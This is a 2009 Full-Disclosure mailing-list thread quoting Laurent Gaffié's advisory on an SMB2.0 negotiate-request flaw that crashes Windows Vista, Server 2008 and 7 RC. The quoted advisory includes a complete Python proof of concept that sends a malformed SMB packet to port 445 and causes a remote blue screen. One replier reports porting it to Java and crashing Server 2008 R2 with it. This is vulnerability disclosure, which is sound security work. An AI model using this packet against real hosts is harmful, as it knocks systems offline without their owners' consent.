[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
- To: "D-vice" <lord.x86@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
- From: "Randal T. Rioux" <randy@xxxxxxxxxxxxxxx>
- Date: Mon, 14 Sep 2009 12:12:06 -0400
It's fun :-)
On Mon, September 14, 2009 12:14 pm, D-vice wrote:
> You wrote an exploit in java....
>
>
> *head explodes*
>
> On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
> <randy@xxxxxxxxxxxxxxx>wrote:
>
>> After testing my version of the exploit (using Java instead of Python) I
>> tried it against a Windows Server 2008 R2 installation - it went down.
>>
>> http://www.procyonlabs.com/software/smb2_bsoder
>>
>> Randy
>>
>>
>> laurent gaffie wrote:
>> > Advisory updated :
>> >
>> >
>> > =============================================
>> > - Release date: September 7th, 2009
>> > - Discovered by: Laurent Gaffié
>> > - Severity: High
>> > =============================================
>> >
>> > I. VULNERABILITY
>> > -------------------------
>> > Windows Vista, Server 2008 < R2, 7 RC :
>> > SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>> >
>> > II. BACKGROUND
>> > -------------------------
>> > Windows vista and newer Windows comes with a new SMB version named
>> SMB2.
>> > See:
>> >
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
>> > for more details.
>> >
>> > III. DESCRIPTION
>> > -------------------------
>> > [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
>> > patch, for another SMB2.0 security issue:
>> > KB942624 (MS07-063)
>> > Installing only this specific update on Vista SP0 create the following
>> > issue:
>> >
>> > SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> > PROTOCOL REQUEST functionnality.
>> > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to
>> a
>> > SMB server, and it's used to identify the SMB dialect that will be
>> used
>> > for futher communication.
>> >
>> > IV. PROOF OF CONCEPT
>> > -------------------------
>> >
>> > Smb-Bsod.py:
>> >
>> > #!/usr/bin/python
>> > #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
>> field
>> > #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
>> >
>> > from socket import socket
>> >
>> > host = "IP_ADDR", 445
>> > buff = (
>> > "\x00\x00\x00\x90" # Begin SMB header: Session message
>> > "\xff\x53\x4d\x42" # Server Component: SMB
>> > "\x72\x00\x00\x00" # Negociate Protocol
>> > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> > "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> > "\x30\x30\x32\x00"
>> > )
>> > s = socket()
>> > s.connect(host)
>> > s.send(buff)
>> > s.close()
>> >
>> > V. BUSINESS IMPACT
>> > -------------------------
>> > An attacker can remotly crash any Vista/Windows 7 machine with SMB
>> enable.
>> > Windows Xp, 2k, are NOT affected as they dont have this driver.
>> >
>> > VI. SYSTEMS AFFECTED
>> > -------------------------
>> > [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server
>> 2008
>> > < R2, Windows 7 RC.
>> >
>> > VII. SOLUTION
>> > -------------------------
>> > No patch available for the moment.
>> > Close SMB feature and ports, until a patch is provided.
>> > Configure your firewall properly
>> > You can also follow the MS Workaround:
>> > http://www.microsoft.com/technet/security/advisory/975497.mspx
>> >
>> > VIII. REFERENCES
>> > -------------------------
>> > http://www.microsoft.com/technet/security/advisory/975497.mspx
>> >
>> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
>> >
>> > IX. CREDITS
>> > -------------------------
>> > This vulnerability has been discovered by Laurent Gaffié
>> > Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com>
>> >
>> > X. REVISION HISTORY
>> > -------------------------
>> > September 7th, 2009: Initial release
>> > September 11th, 2009: Revision 1.0 release
>> >
>> > XI. LEGAL NOTICES
>> > -------------------------
>> > The information contained within this advisory is supplied "as-is"
>> > with no warranties or guarantees of fitness of use or otherwise.
>> > I accept no responsibility for any damage caused by the use or
>> > misuse of this information.
>> >
>> > XII.Personal Notes
>> > -------------------------
>> > Many persons have suggested to update this advisory for RCE and not
>> BSOD:
>> > It wont be done, if they find a way to execute code, they will publish
>> > them advisory.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/